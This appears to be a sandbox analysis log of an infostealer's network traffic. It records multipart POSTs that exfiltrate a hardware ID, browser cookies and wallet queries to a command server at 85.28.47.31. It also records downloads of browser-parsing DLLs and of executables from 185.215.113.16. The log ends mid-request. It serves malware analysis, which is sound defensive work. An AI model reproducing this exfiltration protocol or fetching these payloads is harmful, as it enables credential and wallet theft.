Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIECHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 42 42 30 41 46 41 33 31 36 44 33 33 39 32 32 35 39 37 34 39 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 2d 2d 0d 0a Data Ascii: ------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="hwid"A1BB0AFA316D3392259749------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="build"sila------GIECFIEGDBKJKFIDHIEC--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 2d 2d 0d 0a Data Ascii: ------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="message"browsers------DAFIEHIEGDHIDGDGHDHJ--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEHIIJJECFHJKECFHDGHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 2d 2d 0d 0a Data Ascii: ------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="message"plugins------JKEHIIJJECFHJKECFHDG--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEHJKJJJECFHJJJKKECHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 2d 2d 0d 0a Data Ascii: ------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="message"fplugins------IIEHJKJJJECFHJJJKKEC--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHIIHost: 85.28.47.31Content-Length: 6975Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHCHost: 85.28.47.31Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 2d 2d 0d 0a Data Ascii: ------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 2d 2d 0d 0a Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file"------EGCBFIEHIEGCAAAKKKKE--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 2d 2d 0d 0a Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file"------EGCBFIEHIEGCAAAKKKKE--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 2d 2d 0d 0a Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file"------EGCBFIEHIEGCAAAKKKKE--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 2d 2d 0d 0a Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file"------EGCBFIEHIEGCAAAKKKKE--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAAHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 2d 2d 0d 0a Data Ascii: ------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="file"------AEGIJKEHCAKFCAKFHDAA--
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDAHost: 85.28.47.31Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCAAFHIEBKJKEBFIEHDHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 2d 2d 0d 0a Data Ascii: ------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="message"wallets------BGCAAFHIEBKJKEBFIEHD--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDAHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 2d 2d 0d 0a Data Ascii: ------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="message"ybncbhylepme------KFHCAEGCBFHJDGCBFHDA--
Source: global traffic	HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/enter.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIECHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 